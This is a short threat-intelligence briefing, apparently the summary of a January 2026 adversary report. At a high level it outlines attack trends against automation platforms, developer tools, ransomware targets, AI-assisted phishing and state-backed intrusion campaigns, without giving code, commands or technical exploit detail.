Threatsploit Adversary Report January 2026

This edition tracks a clear change in infiltration tactics. Attackers are no longer testing the outer edge of networks. They are entering through everyday software and services that organisations depend on. Compromises now originate inside workflow engines, development tools, shared libraries, browser components and identity systems. These entry points give adversaries immediate proximity to core operations and allow them to bypass traditional controls.

What makes these incidents especially serious is the way they blend into normal activity. Many of these attacks move through systems quietly, operating beneath alert thresholds and hiding in trusted processes. By examining real intrusions, this report helps security teams understand where modern weak spots are forming and highlights internal assets that demand immediate focus.

1. Compromise Through Automation Platforms

Vulnerabilities in n8n and React Server Components let attackers execute commands inside backend workflows, turning operational pipelines into remote control points.

2. Developer Tools Used as Entry Points

Glassworm based VS Code extensions and fake npm modules harvest credentials, siphon source code, and tamper with build environments, allowing intrusion before software is even deployed.

3. Ransomware Campaigns That Disable Defences First

VolkLocker and Shanya enabled crews hide payloads, strip away monitoring, and attack Windows and Linux environments together, maximising disruption before anyone notices.

4. Artificial Intelligence Driving Credential Theft

WormGPT type tools and browser embedded phishing kits copy banking and login pages with precision while intercepting authentication codes and stealing live sessions.

5. State Backed Groups Embedded in Business Infrastructure

Activity linked to China, Russia, Iran, and North Korea shows malware delivered through Group Policy files, QR lures, notarised macOS installers, and cloud synced services, with persistence designed to last months.